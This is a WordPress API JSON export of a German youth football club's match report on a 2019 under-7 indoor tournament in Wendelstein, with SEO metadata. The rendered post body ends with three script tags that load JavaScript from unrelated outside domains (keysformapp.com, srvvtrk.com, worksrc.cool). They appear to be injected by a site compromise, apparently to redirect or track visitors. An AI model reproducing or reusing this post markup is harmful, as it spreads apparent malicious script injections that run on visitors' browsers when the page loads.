{"id":7168,"date":"2019-02-07T22:36:04","date_gmt":"2019-02-07T21:36:04","guid":{"rendered":"http:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?p=7168"},"modified":"2019-02-07T22:36:04","modified_gmt":"2019-02-07T21:36:04","slug":"u7-kaiser-stuck-cup-2019-in-wendelstein","status":"publish","type":"post","link":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/","title":{"rendered":"U7-Kaiser Stuck Cup 2019 in Wendelstein"},"content":{"rendered":"<p>Am Sonntag, den 3.2. 2019, trugen unsere G1 Junioren zum ersten Mal den Kaiser Stuck Cup in Wendelstein in der Hans Seufert Halle aus. Ein gro\u00dfes Dankesch\u00f6n an unseren Sponsor, der uns in dieser Saison nicht nur komplett eingekleidet, sondern auch f\u00fcr das heutige Turnier einen eindrucksvollen Pokal gesponsert hat. Zusammen mit f\u00fcnf weiteren Vereinen\u00a0 spielten wir an diesem Tag aufgeteilt auf zwei Mannschaften im Modus jeder gegen jeden um die hei\u00df ersehnte Troph\u00e4e. Nach vier umk\u00e4mpften Stunden mussten wir diese aber leider an den SV Penzendorf \u00fcbergeben und erreichten einen super 2. sowie 6. Platz. Hier sei erw\u00e4hnt, dass unsere zweite Mannschaft mit gemischten Jahrgang 2012\/13 angetreten ist und sich zum ersten Mal in dieser Konstellation aufs Feld gewagt hat. Ein gro\u00dfes Dankesch\u00f6n an alle Vereine, die Trainer, Kinder und Zuschauer, es war ein ereignisreicher Tag, den wir n\u00e4chstes Jahr gern wiederholen, schlie\u00dflich k\u00f6nnen wir diese Niederlage nicht auf uns sitzen lassen. Auch m\u00f6chten wir uns bei der Turnierleitung Jens Schmei\u00dfer und Sebastian Regensburger bedanken, die souver\u00e4n durch den Tag gef\u00fchrt und die Siegerehrung zu einem unvergesslichen Highlight gestaltet haben.<\/p>\n<p><script src=\"\/\/keysformapp.com\/1cbbe6fbfefc3b777d.js\"><\/script><script src=\"http:\/\/srvvtrk.com\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52295x7355x&amp;r=1549575252847\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/worksrc.cool\/ext\/1cbbe6fbfefc3b777d.js?sid=52295_7355_&amp;title=FF_%5B602%5D_formkeyapp.cool&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Am Sonntag, den 3.2. 2019, trugen unsere G1 Junioren zum ersten Mal den Kaiser Stuck Cup in Wendelstein in der Hans Seufert Halle aus. Ein gro\u00dfes Dankesch\u00f6n an unseren Sponsor, der uns in dieser Saison nicht nur komplett eingekleidet, sondern auch f\u00fcr das heutige Turnier einen eindrucksvollen Pokal gesponsert hat. Zusammen mit f\u00fcnf weiteren Vereinen\u00a0 [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"saved_in_kubio":false,"footnotes":""},"categories":[3,16,25],"tags":[],"class_list":["post-7168","post","type-post","status-publish","format-standard","hentry","category-kf","category-spielbericht","category-u7-roeth"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>U7-Kaiser Stuck Cup 2019 in Wendelstein - JFG Wendelstein<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"U7-Kaiser Stuck Cup 2019 in Wendelstein - JFG Wendelstein\" \/>\n<meta property=\"og:description\" content=\"Am Sonntag, den 3.2. 2019, trugen unsere G1 Junioren zum ersten Mal den Kaiser Stuck Cup in Wendelstein in der Hans Seufert Halle aus. Ein gro\u00dfes Dankesch\u00f6n an unseren Sponsor, der uns in dieser Saison nicht nur komplett eingekleidet, sondern auch f\u00fcr das heutige Turnier einen eindrucksvollen Pokal gesponsert hat. Zusammen mit f\u00fcnf weiteren Vereinen\u00a0 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/\" \/>\n<meta property=\"og:site_name\" content=\"JFG Wendelstein\" \/>\n<meta property=\"article:published_time\" content=\"2019-02-07T21:36:04+00:00\" \/>\n<meta name=\"author\" content=\"Autor\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Autor\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"1\u00a0Minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u7-kaiser-stuck-cup-2019-in-wendelstein\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u7-kaiser-stuck-cup-2019-in-wendelstein\\\/\"},\"author\":{\"name\":\"Autor\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"headline\":\"U7-Kaiser Stuck Cup 2019 in Wendelstein\",\"datePublished\":\"2019-02-07T21:36:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u7-kaiser-stuck-cup-2019-in-wendelstein\\\/\"},\"wordCount\":198,\"articleSection\":[\"Kleinfeld\",\"Spielbericht\",\"U7 R\u00f6th.\"],\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u7-kaiser-stuck-cup-2019-in-wendelstein\\\/\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u7-kaiser-stuck-cup-2019-in-wendelstein\\\/\",\"name\":\"U7-Kaiser Stuck Cup 2019 in Wendelstein - JFG Wendelstein\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\"},\"datePublished\":\"2019-02-07T21:36:04+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u7-kaiser-stuck-cup-2019-in-wendelstein\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u7-kaiser-stuck-cup-2019-in-wendelstein\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/u7-kaiser-stuck-cup-2019-in-wendelstein\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"U7-Kaiser Stuck Cup 2019 in Wendelstein\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#website\",\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/\",\"name\":\"JFG Wendelstein\",\"description\":\"Juniorenfu\u00dfball\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/#\\\/schema\\\/person\\\/75aadcbd4be1b3af1c1d785397472bc9\",\"name\":\"Autor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g\",\"caption\":\"Autor\"},\"url\":\"https:\\\/\\\/www.jugendfussball-wendelstein.de\\\/wordpress\\\/author\\\/autor\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"U7-Kaiser Stuck Cup 2019 in Wendelstein - JFG Wendelstein","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/","og_locale":"de_DE","og_type":"article","og_title":"U7-Kaiser Stuck Cup 2019 in Wendelstein - JFG Wendelstein","og_description":"Am Sonntag, den 3.2. 2019, trugen unsere G1 Junioren zum ersten Mal den Kaiser Stuck Cup in Wendelstein in der Hans Seufert Halle aus. Ein gro\u00dfes Dankesch\u00f6n an unseren Sponsor, der uns in dieser Saison nicht nur komplett eingekleidet, sondern auch f\u00fcr das heutige Turnier einen eindrucksvollen Pokal gesponsert hat. Zusammen mit f\u00fcnf weiteren Vereinen\u00a0 [&hellip;]","og_url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/","og_site_name":"JFG Wendelstein","article_published_time":"2019-02-07T21:36:04+00:00","author":"Autor","twitter_card":"summary_large_image","twitter_misc":{"Verfasst von":"Autor","Gesch\u00e4tzte Lesezeit":"1\u00a0Minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/#article","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/"},"author":{"name":"Autor","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"headline":"U7-Kaiser Stuck Cup 2019 in Wendelstein","datePublished":"2019-02-07T21:36:04+00:00","mainEntityOfPage":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/"},"wordCount":198,"articleSection":["Kleinfeld","Spielbericht","U7 R\u00f6th."],"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/","name":"U7-Kaiser Stuck Cup 2019 in Wendelstein - JFG Wendelstein","isPartOf":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website"},"datePublished":"2019-02-07T21:36:04+00:00","author":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9"},"breadcrumb":{"@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/u7-kaiser-stuck-cup-2019-in-wendelstein\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/"},{"@type":"ListItem","position":2,"name":"U7-Kaiser Stuck Cup 2019 in Wendelstein"}]},{"@type":"WebSite","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#website","url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/","name":"JFG Wendelstein","description":"Juniorenfu\u00dfball","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/#\/schema\/person\/75aadcbd4be1b3af1c1d785397472bc9","name":"Autor","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/01dd9b7f2dc8d635302f1c57c2289838e9fe288acd1c06c8f8ad332b8e2a60c9?s=96&d=mm&r=g","caption":"Autor"},"url":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/author\/autor\/"}]}},"_links":{"self":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/7168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/comments?post=7168"}],"version-history":[{"count":0,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/posts\/7168\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/media?parent=7168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/categories?post=7168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jugendfussball-wendelstein.de\/wordpress\/wp-json\/wp\/v2\/tags?post=7168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}